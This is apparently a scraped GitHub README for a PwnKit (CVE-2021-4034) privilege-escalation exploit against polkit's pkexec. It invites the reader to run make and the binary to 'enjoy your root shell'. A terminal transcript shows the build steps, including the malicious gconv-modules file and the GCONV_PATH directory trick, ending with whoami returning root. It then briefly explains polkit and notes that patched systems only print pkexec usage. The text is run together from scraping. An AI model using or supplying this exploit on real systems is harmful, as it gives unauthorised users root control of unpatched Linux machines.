Repository files navigation

Just executemake,./cve-2021-4034 and enjoy your root shell.

If the exploit is working you'll get a root shell immediately:

vagrant@ubuntu-impish:~/CVE-2021-4034$ makecc -Wall --shared -fPIC -o pwnkit.so pwnkit.ccc -Wall    cve-2021-4034.c   -o cve-2021-4034echo"module UTF-8// PWNKIT// pwnkit 1"> gconv-modulesmkdir -p GCONV_PATH=.cp /usr/bin/true GCONV_PATH=./pwnkit.so:.vagrant@ubuntu-impish:~/CVE-2021-4034$ ./cve-2021-4034# whoamiroot# exit

Updating polkit on most systems will patch the exploit, therefore you'll get the usage and the program will exit:

vagrant@ubuntu-impish:~/CVE-2021-4034$ ./cve-2021-4034pkexec --version|       --help|       --disable-internal-agent|       [--user username] PROGRAM [ARGUMENTS...]See the pkexec manual pagefor more details.vagrant@ubuntu-impish:~/CVE-2021-4034$

Polkit (formerly PolicyKit) is a component for controlling system-wide privileges in Unix-like operating systems. It provides an organized way for non-privileged processes to communicate with privileged processes. It is also possible to use polkit to execute commands with elevated privileges using the command pkexec followed by the command intended to be executed (with root permission).